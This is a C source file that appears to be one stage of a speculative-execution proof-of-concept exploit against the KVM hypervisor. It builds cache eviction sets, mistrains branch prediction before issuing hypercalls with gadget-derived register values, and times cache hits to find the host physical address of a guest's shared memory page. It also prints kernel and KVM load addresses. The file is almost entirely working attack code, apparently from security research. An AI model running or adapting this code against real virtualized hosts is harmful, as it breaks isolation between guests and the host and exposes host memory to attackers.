#include "common.h"

#define STEP_SIZE 100

struct page *shared_pages;
struct cacheline *eviction_sets[SETS_PER_IN_PAGE_OFFSET+2] = {NULL};

void handle_shared_page_candidate(int i, unsigned long phys_addr) {
  pipeline_flush();
  printf("%s testing candidate...\n", cur_time());
  clflush(&shared_pages[i]);
  int count = 0;
  for (unsigned int set_id = 1; eviction_sets[set_id]; set_id++) {
    for (int j=0; j<100; j++) {
      pipeline_flush();
      do_flushing_and_time(eviction_sets[set_id], NULL);
      unsigned long r8val = phys_addr - 0xf8UL;
      unsigned long rop_relocated_immediate = 0UL - (unsigned long)PER_CPU_OFFSET_ADDRESS;
      unsigned long r9val = ((rop_relocated_immediate + PAGE_OFFSET_BASE_ADDRESS) / 8UL);
      train_mispredict_and_hypercall(r8val, r9val, PHYS_LOAD_ADDRESS);

      if (is_hot(&shared_pages[i]))
        count++;
      pipeline_flush();
      asm volatile("mfence":::"memory");
      clflush(&shared_pages[i]);
      asm volatile("mfence":::"memory");
    }
    pipeline_flush();
  }
  pipeline_flush();
  if (count > 5) {
    printf("%s success! count=%d\n", cur_time(), count);
    shared_pages[i].phys_addr = phys_addr;
    write_ulong_to_file("selected_page", i);
    exit(0);
  }
  printf("%s false positive? going on...\n", cur_time());
}

int main(void) {
  printf("%s === starting find_phys_mapping_kassist ===\n", cur_time());
  common_init();
  hot_cold_init();
  printf("%s kernel_load_address: 0x%lx\n", cur_time(), kernel_load_address);
  printf("%s kvm_load_address: 0x%lx\n", cur_time(), kvm_load_address);
  printf("%s kvm_intel_load_address (truncated): 0x%05lx\n", cur_time(), kvm_intel_load_address);

  int shared_pages_area_fd = open("/dev/shm/shared_pages", O_RDWR|O_EXCL|O_CREAT, 0666);
  if (shared_pages_area_fd == -1)
    err(1, "open shared area file");
  if (ftruncate(shared_pages_area_fd, BATCH_FACTOR*0x1000))
    err(1, "ftruncate");
  shared_pages = mmap(NULL, BATCH_FACTOR*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, shared_pages_area_fd, 0);
  if (shared_pages == MAP_FAILED)
    err(1, "mmap");
  for (int i=0; i<BATCH_FACTOR; i++) {
    shared_pages[i].dedup_ctr = i+1;
    //unsigned long cheat_phys_addr = get_physaddr_cheaty((unsigned long)&shared_pages[i]);
    //printf("shared_pages[%d]: phys_addr=0x%lx step=%lu\n", i, cheat_phys_addr, (cheat_phys_addr/0x1000)%STEP_SIZE);
  }
  //printf("\n");
  pipeline_flush();
  for (int i=0; i<BATCH_FACTOR; i++)
    clflush(&shared_pages[i]);
  pipeline_flush();

  struct cacheline *cachelines = map_cachelines();

  for (unsigned int set_id = 1; 1; set_id++) {
    int set_size = get_lines_with_set_id_cm(eviction_sets+set_id, cachelines, set_id, EVICTION_SET_SIZE);
    if (set_size == 0) {
      eviction_sets[set_id] = NULL;
      break;
    }
    assert(set_id <= SETS_PER_IN_PAGE_OFFSET);
  }

  int last_cycle_time = time(NULL);
  int cycles_per_sec = 0;
  for (unsigned long step = 0; step < STEP_SIZE; step++) {
    for (unsigned long phys_addr = 0x1000UL*step; phys_addr < 0x1100000000UL; ) { /* 64GB max */
      for (unsigned int set_id=1; 1; set_id++) {
        if (cycles_per_sec%1000 == 0) {
          int now_time = time(NULL);
          if (now_time >= last_cycle_time+/*60*/15) {
            printf("%s cycles=%d; step=%lu/%d; addr=0x%lx\n", cur_time(), cycles_per_sec, step, STEP_SIZE, phys_addr);
            last_cycle_time = now_time;
            cycles_per_sec = 0;
          }
        }

        if (eviction_sets[set_id] == NULL)
          break;
        assert(set_id <= SETS_PER_IN_PAGE_OFFSET);

        pipeline_flush();
        do_flushing_and_time(eviction_sets[set_id], NULL);
        unsigned long r8val = phys_addr - 0xf8UL;
        unsigned long rop_relocated_immediate = 0UL - (unsigned long)PER_CPU_OFFSET_ADDRESS;
        unsigned long r9val = ((rop_relocated_immediate + PAGE_OFFSET_BASE_ADDRESS) / 8UL);
        train_mispredict_and_hypercall(r8val, r9val, PHYS_LOAD_ADDRESS);

        for (int i=0; i<BATCH_FACTOR; i++) {
          if (is_hot(&shared_pages[i])) {
            unsigned long real_phys_addr = get_physaddr_cheaty((unsigned long)&shared_pages[i]);
            printf("%s ### idx=%03d set_id=%03u phys_addr=0x%lx cheat_phys_addr=0x%lx\n",
                   cur_time(), i, set_id, phys_addr, real_phys_addr);
            handle_shared_page_candidate(i, phys_addr);
          }
        }
        pipeline_flush();
        asm volatile("mfence":::"memory");
        for (int i=0; i<BATCH_FACTOR; i++) {
          clflush(&shared_pages[i]);
        }
        asm volatile("mfence":::"memory");
        cycles_per_sec++;
        phys_addr += 0x1000 * STEP_SIZE;
      }
    }
  }
  printf("%s find_phys_mapping_kassist failed :(\n", cur_time());
  return 1;
}
